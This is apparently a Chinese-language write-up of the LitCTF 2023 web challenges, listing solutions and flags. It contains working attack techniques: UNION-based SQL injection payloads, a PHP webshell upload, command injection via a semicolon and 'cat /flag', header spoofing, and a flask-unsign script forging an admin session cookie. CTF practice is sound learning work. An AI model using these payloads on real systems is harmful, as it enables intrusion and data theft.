LitCTF 2023

官方wp：https://dqgom7v7dl.feishu.cn/docx/VyLmdhKDOou5E8xruA7c8bSInKf

web

我 Flag 呢？

查询源代码

NSSCTF{35a119e1-89cf-4133-88d0-61a81d8303f5}

彩蛋 1：

LitCTF{First_t0_The_k3y! (1/?)

导弹迷踪

找到game.js，代码过第六关的时候会弹出flag，flag泄露

flag{y0u_w1n_th1s_!!!}

Follow me and hack me

get post 备份文件

NSSCTF{64b164d6-78e9-4fff-b0a6-51804ca156d7}

彩蛋 3:

dirsearch走一波

url/www.zip 下载文件

文本打开bak文件

R3ady_P14yer_000ne(3/?)

ps:这里 cookie 要等于 flag 的，但是我火狐没开 cookie 就跳过了好像，直接出 flag 了。0.0

PHP 是世界上最好的语言！！（wp 复现）

system(‘cat /flag’);

NSSCTF{28ceaa6e-ec30-4105-9f80-07148c37f547}

受不了一点

Vim yyds

vim 在编辑文档的过程中如果异常退出，会产生缓存文件，第一次产生的缓存文件后缀为.swp，后面会产生.swo
URL/index.php.swp 或者 .index.php.swp 下载缓存文件

这里/.index.php.swp下载文件

紧接放入vim看看
口令：vim xxx.swp

看不到啥东西，试试直接记事本打开看看

有php代码，看看逻辑
POST一个参数cmd，cmd的值将作为系统命令执行
POST一个参数password，它的值进行base64编码后要强等于它的值
并且告诉我们值为Give_Me_Your_Flag

构造cmd=cat /flag 得到flag

NSSCTF{2b0de9e7-8e90-411a-8659-4ad5ede0a36e}

作业管理系统

文件上传，一句话木马

源代码注释处发现用户名和密码
用户名：admin，密码：admin 登录

上传一句话木马文件进去

进入一句话木马文件内，然后运行口令即可

**NSSCTF{2d63a23c-8552-48d1-b029-61a727e60845} **

彩蛋 2：

进入https://github.com/ProbiusOfficial/My_pic/blob/main/demo.jpg

_S0_ne3t? (2/?)

这是什么？SQL ！注一下！（wp 复现）

sql 手工注入

Get 一个参数 id，给出源码，闭环为 6 个）

题目给出了列名是 username,password 两个，所以我们也不需要用 Order by 去爆破列名了

爆破顺序：列数 > 库 > 表 > 列(字段)

列：column，库：schema，表：table

爆库:?id=1)))))) union select 1,group_concat(schema_name) from information_schema.schemata --+

复现只看 flag 的库：ctftraining

爆表:?id=1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining' --+

爆列：?id=1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema = 'ctftraining' --+

得知flag列在ctftraining库的flag表中，那么将这个列的信息抓出来看看

**NSSCTF{3dbfe5bc-0522-4019-aabb-0281184cbf45} **

彩蛋 4：

搜索2就行

F1rst_to_Th3_eggggggggg!

Http pro max plus（wp 复现）

Client-ip: 127.0.0.1 伪造本地访问
Referer: pornhub.com 伪造来源网址
User-Agent: Chrome 伪造使用的浏览器
via: Clash.win 伪造代理服务器地址

访问/wtfwtfwtfwtf.php

按钮都是无用项，在源码注释处找到 hint

访问/sejishikong.php

NSSCTF{82fca04a-f925-4382-bff5-4fea98e39196}

Ping

这里展示； —> %3B
‘cmd1;cmd2 无论前面执行是否成功后面都继续执行’

NSSCTF{53ee44eb-716a-4534-90ce-3a6562e1ec91}

PS：
当完成某个条件后能够直接弹出 flag，说明 flag 的展示逻辑已经在服务器端实现了，完成条件会触发服务器端返回 flag 的响应。
而当使用 Burp Suite 抓包并发送请求时才能找到 flag，可能是因为 flag 的展示逻辑被实现在客户端的 JavaScript 代码中，而不是服务器端。在这种情况下，完成条件只是触发了客户端的 JavaScript 代码执行，然后根据返回的数据进行处理展示。因此，通过使用 Burp Suite 抓包并修改请求，可以在发送给服务器之前修改请求中的参数，使得服务器返回 flag。

1zjs

Your gift just take it : /f@k3f1ag.php
访问http://node2.anna.nssctf.cn:28116/f@k3f1ag.php

全选放控制台

NSSCTF{9b94a89d-ed34-481e-ba8c-b89f9e757a86}

彩蛋

彩蛋分布于我Flag呢 Follow me and hack me 作业管理系统狠狠的注入四个题目中

LitCTF{First_t0_The_k3y!_S0_ne3t?_R3ady_P14yer_000ne_F1rst_to_Th3_eggggggggg!}

就当无事发生

gitcommit，github 历史记录

访问博客**

点进第一个博客

根据wp思路，前往github直接搜索ProbiusOfficial.github.io

这两个都可以，一个是原本，一个是删除flag的，但是操作记录保留了

LitCTF{g1thub_c0mmit_1s_s0_us3ful}

Flag 点击就送！

伪造 session

密钥：‘LitCTF’
工具：**flask-unsign **

脚本：

import requests
import string
import subprocess

SECRET_KEY = "LitCTF"

cmd_out = subprocess.check_output(['flask-unsign', '--sign', '--cookie', '{\'name\': \'admin\'}', '--secret', SECRET_KEY])

cookie = {'session' : cmd_out.decode().rstrip()}
response = requests.get('http://node5.anna.nssctf.cn:28403/flag', cookies=cookie)

print(response.text)